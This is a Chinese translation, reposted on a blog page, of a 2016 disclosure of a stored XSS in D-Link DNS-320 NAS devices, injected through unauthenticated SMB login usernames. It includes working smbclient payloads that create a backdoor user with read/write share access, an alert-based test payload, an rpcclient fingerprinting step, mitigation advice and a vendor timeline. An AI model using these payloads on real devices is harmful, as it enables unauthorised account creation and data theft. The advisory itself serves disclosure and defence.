关闭

D-Link NAS, DNS 系列:通过非认证SMB实现存储型XSS

231人阅读 评论(0) 收藏 举报
分类:

2016-08-30 17:33:22 来源:安全客 作者:mpk_no1 
阅读:828次 点赞(1) 收藏(4)


分享到:

http://p7.qhimg.com/t01ce575b5fe8003e67.png

1.前言


D-Link DNS-320是一款NAS网络存储器(http://www.dlink.com/uk/en/support/product/dns-320-2-bay-sharecenter-network-storage-enclosure).

该设备允许用户通过SMB(服务器信息块)访问存储数据,并且可以通过一个web界面对它进行配置。

然而,这个web管理界面包含一个存储型跨站点脚本漏洞,利用的是一个未经身份验证的SMB登录尝试(445/tcp)。当受害者登录web管理界面时,注入的代码就会执行。

这个漏洞可以通过web界面读写设置信息。最终,攻击者可能会获得设备上存储的数据的完整读写权限。

与反射XSS漏洞不同的是,它不需要受害者打开一个攻击者提供的链接或访问恶意网页。这是一个相对少见的XSS漏洞, 不管受害者是直接还是间接地访问有漏洞的web应用程序,恶意代码都可以被注入。因此,即使端口80/tcp(HTTP)和443/tcp(HTTPS)的访问被禁,仍然可以利用这个漏洞。

CVE-ID

目前,MITRE并没有为这个漏洞指定一个CVE-ID,可以参阅下面的链接了解一些背景知识:http://seclists.org/oss-sec/2016/q1/512。


2.漏洞细节


D-Link DNS-320将失败的SMB登录尝试保存在一个日志文件中。当使用一个不存在的用户名进行登陆尝试时,这个用户名会被保存起来,随后未加清理就显示出来。这就是该漏洞利用的注入点。日志文件的内容可以在设备的web界面查看;在一个专门的页面(管理- >系统管理- >日志:

<http://<IP>/web/management.html?id=log>)

或在主页上

<http://<IP>/web/home.html>

这两个页面都有相同的漏洞,但由于主页在登录成功后会自动加载,所以注入代码会立即运行,不能进行进一步的用户交互。

由于恶意代码使用SMB协议注入,而不是使用导致其最终执行的HTTP协议,因此阻止外部访问web界面并不能防止这个漏洞的利用。


3.漏洞利用/概念证明


由于这个漏洞的本质,自动化地将恶意代码注入到一系列含有此漏洞的设备中是很容易的。

以下两个smbclient命令作为一个概念证明。它们的目的是注入一段代码,用来创建一个使用攻击者选择的密码的新用户。此外,它会向这个新用户提供设备默认共享盘(“Volume_1”) 的读/写权限;默认情况下,可以获得存储在主硬盘驱动器上数据的完整读写权限。

1
<span style="font-family: 微软雅黑, 'Microsoft YaHei';">smbclient -U '<img src=&#47;cgi-bin&#47;account_mgr.cgi?cmd=cgi_adduser_to_session&s_name=Volume_1&ftp=true&read_list=&write_list=baduser&decline_list=&username=baduser&>' -N  '\\x\Volume_1' -I <TARGET IP><br> <br>smbclient -U '<img src=&#47;cgi-bin&#47;account_mgr.cgi?cmd=cgi_user_add&name=baduser&pw=badpass&>' -N  '\\x\Volume_1' -I <TARGET IP></span>


一旦管理员登录到设备的web界面,这段代码将会执行:创建一个使用攻击者选择的密码的新用户,获取共享盘“Volume_1”的读/写权限。

如果想要确认一个设备是否是脆弱型号之一,可以使用rpcclient。在输入querydominfo命令后,可以在“Comment”旁边找到型号名:

[~] $ rpcclient -U "" -N <TARGET IP>

rpcclient $> querydominfo

Domain:           WORKGROUP

Server:           DLINK-EXXXXX

Comment:    DNS-320 <===== Model

Total Users: 3

[...]

一些读者可能想要验证他们的设备上是否存在该漏洞,但又不想进行配置更改。在这种情况下,可以使用以下命令:


1
smbclient -U 'a<img src=x onerror=eval("alert(String.fromCharCode(88,83,83,64)+document.domain)")>b' -N  '\\x\Volume' -I <TARGET IP>


如果设备的确包含有该漏洞,那么用户在下次登录到设备的web界面时,将会看到一个带有“XSS”字符串的弹出窗口:

http://p4.qhimg.com/t01b30ae9963e96a7ce.png


4.影响的设备/版本



这个漏洞最初是在一个运行固件版本2.05 b8(也称为:“2.13.0507.2014”)的D-Link DNS-320 rev A的设备上发现的。但是,根据D-Link的消息,以下设备和版本也存在这个漏洞:

http://p5.qhimg.com/t015f79b32516e6620f.png

此外,早期和后来的版本也有可能受到该漏洞的影响。


5.给终端用户的建议


存在漏洞的设备应该禁止来自不受信任和潜在的恶意网络的访问。如果你觉得这些访问有问题,请立即终止连接。

如果一个存在漏洞的设备没有连接到互联网上,而是存在于本地网络,那么最大的风险可能来自恶意软件,更具体地说是勒索软件。

勒索软件正变得越来越强大,而且这种发展还不受到感染和躲避机制的局限。未来勒索软件可能会适应其周围环境,让自己的影响达到最大化,随后,受害者支付赎金的可能性也会大大增加。

NAS设备通常用于存储用户认为重要的备份数据。本文描述的漏洞可以使得勒索软件在下一次受害者登陆web管理界面时删除NAS设备上的数据。

因此,建议终端用户首先确定自己设备上安装的固件版本是否含有该漏洞,如果有,请及时进行固件更新。

确定当前安装的固件版本

当前安装的固件版本可以通过web管理界面确认。

根据D-Link的未来版本控制系统,也许有必要使用固件的日期来区分是否含有该漏洞。

例如,如果型号是DNS-320 rev A,web界面显示的固件版本是“2.05”,那么含有漏洞的固件版本可以通过显示的日期“05/07/2014”(或更早)来确认:

Current NAS Firmware Version   2.05

Firmware Date      05/07/2014

如果在今年晚些时候发布的固件版本2.05 b99中修复了该漏洞,那么web界面显示的固件版本可能如下所示:

Current NAS Firmware Version   2.05

Firmware Date       12/12/2016

具体含有漏洞的设备和版本请参考第4节。

固件更新时的建议

如果D-Link在固件更新中解决了这个漏洞,其安装程序会要求用户登录到存在漏洞的web界面。然而,如果攻击者已经设法在web界面存储了恶意代码,那么登陆去安装更新可能会执行这段代码。

不过,在写这篇文章时,还没有存在已知的针对该漏洞的野外攻击,但是,在更新时也应该采取一些预防措施,使得应用更新以一个安全的方式进行:

将设备和用于管理设备的计算机从所有网络中断开;

为了降低相关硬盘上数据的风险,在登录到web界面之前:关掉设备、断开所有的硬盘,只保留一个,并且不能保存重要数据、重新打开设备;

为了减少一些漏洞利用尝试所带来的风险:检查所有可疑的或多余的配置选项,尤其是那些与“账户管理”有关的配置,或恢复默认的配置选项/工厂设置(系统管理- >系统设置- >默认值- >恢复);

下载并进行固件更新。


6.时间轴


2016-01-11:试图通过web表单向D-Link报告漏洞。

2016-01-21:十天后:仍然没有反应。

2016-01-21:联系security@dlink.com(遵照安全事件响应策略)。

2016-01-21: D-Link在几分钟内响应。

2016-01-22:发送漏洞报告。

2016-01-26: D-Link证实了该漏洞。

2016-02-11:通过cve-assign@mitre.org向MITRE提出CVE-ID请求。

2016-02-12: MITRE驳回了请求。

2016-02-27: D-Link提供预览版更新固件来验证修复。

2016-03-01:对固件进行了评估,并向D-Link发送确认书。

2016-06-08:要求D-Link进行状态更新。

2016-07-08:(一个月后:仍然没有反应。)

2016-07-08:要求D-Link发布状态更新。

2016-07-13: D-Link表示更新固件已经发布在论坛上了,剩下的更新会在“本周结束7/15”发布。

2016-07-19:向D-Link请求更新消息的直接链接。

2016-08-02:两周后:仍然没有反应。  

2016-08-02:本文发表。

原文链接:http://b.fl7.de/2016/08/d-link-nas-dns-xss-via-smb.html

本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:http://b.fl7.de/2016/08/d-link-nas-dns-xss-via-smb.html

0
0
查看评论
发表评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场

阿里云文件存储SMB协议服务及其申请和使用指南

阿里云于2016年发布了支持NFS网络文件系统访问协议的阿里云文件存储。2017年3月,又增加了SMB文件系统访问协议的支持,正式对外公测。本文简单描述了SMB文件存储访问协议以及阿里云SMB协议公测...
  • qq_36510261
  • qq_36510261
  • 2017-05-24 15:45
  • 1632

NAS配置Time Machine,在D-Link DNS-320上的配置笔记

今天打算把Time Machine备份的工作交给NAS,以前是放在一块外置硬盘上的,虽然速度要比NAS快,但是每次插拔外接都有些麻烦。而NAS又具有实时在线、定时关机启动的功能,配合Time Mach...
  • sch0120
  • sch0120
  • 2015-08-22 15:02
  • 3792

XSS学习笔记(二)(存储型XSS,持久型攻击)

持久型XSS攻击就是把攻击数据存进数据库,攻击行为就伴随着攻击数据一直存在,下面找来一个利用持久型攻击获取Session ID,同时向浏览器传送一个cookie,(这里科普一下,即使是使用了sessi...
  • zhx278171313
  • zhx278171313
  • 2014-04-20 14:41
  • 6451

网卡配置和DNS配置,手动挂在nas存储的共享目录,网络相关其它操作命令,修改防火墙中的端口配置,resolv.conf配置详细介绍和网卡信息配置详细介绍

1.   网卡配置和DNS配置若想服务器能够发邮件,需要让部署的服务器能够访问到外网环境。若部署的服务器访问不到外网,通过ping www.baidu.com的方式执行的时候,会出现以下问题: "pi...
  • toto1297488504
  • toto1297488504
  • 2016-12-17 01:17
  • 906

大话存储系列11——NAS、DAS、SAN三国争霸

原文转自:http://www.liusuping.com/storage/das-nas-san-cunchu-jishu-bijiao.html 1、什么是NAS 找了...
  • changyanmanman
  • changyanmanman
  • 2013-03-16 19:05
  • 2581

D-link DI-8004W上网行为认证管理路由器

D-Link DI-8004W是D-Link专为中小型网络环境设计的无线宽带路由器,支持最多4个互联网端口和最多4个局域网端口及300M高速无线传输功能。它采用网络专用处理器,性能优越,能满足40-5...
  • muchlab_1
  • muchlab_1
  • 2014-04-29 16:12
  • 515

存储型Xss成因及挖掘方法

  • 2012-09-20 10:26
  • 3.24MB
  • 下载

D-LinK系列无线路由器设置

  • 2012-09-04 16:43
  • 834KB
  • 下载

ROS 学习系列 -- 使用urdf创建机器人模型在Rviz中3D观察 之一 link使用

 目录(?)[+] 软件环境 小车形状与尺寸创建Ros package 创建lauch文件启动Rviz创建基座base_link创建轮子 使用ROS强大的机器人功能,建立...
  • BBZZ2
  • BBZZ2
  • 2016-05-11 16:35
  • 5708

D-Link系列路由器漏洞挖掘入门

前几天去上海参加了geekpwn,看着大神们一个个破解成功各种硬件,我只能在下面喊 6666,特别羡慕那些大神们。所以回来就决定好好研究一下路由器,争取跟上大神们的步伐。看网上公开的D-Link系列的...
  • qq_27446553
  • qq_27446553
  • 2017-11-08 11:27
  • 165
    个人资料
    • 访问:712755次
    • 积分:7478
    • 等级:
    • 排名:第3410名
    • 原创:23篇
    • 转载:830篇
    • 译文:2篇
    • 评论:23条
    最新评论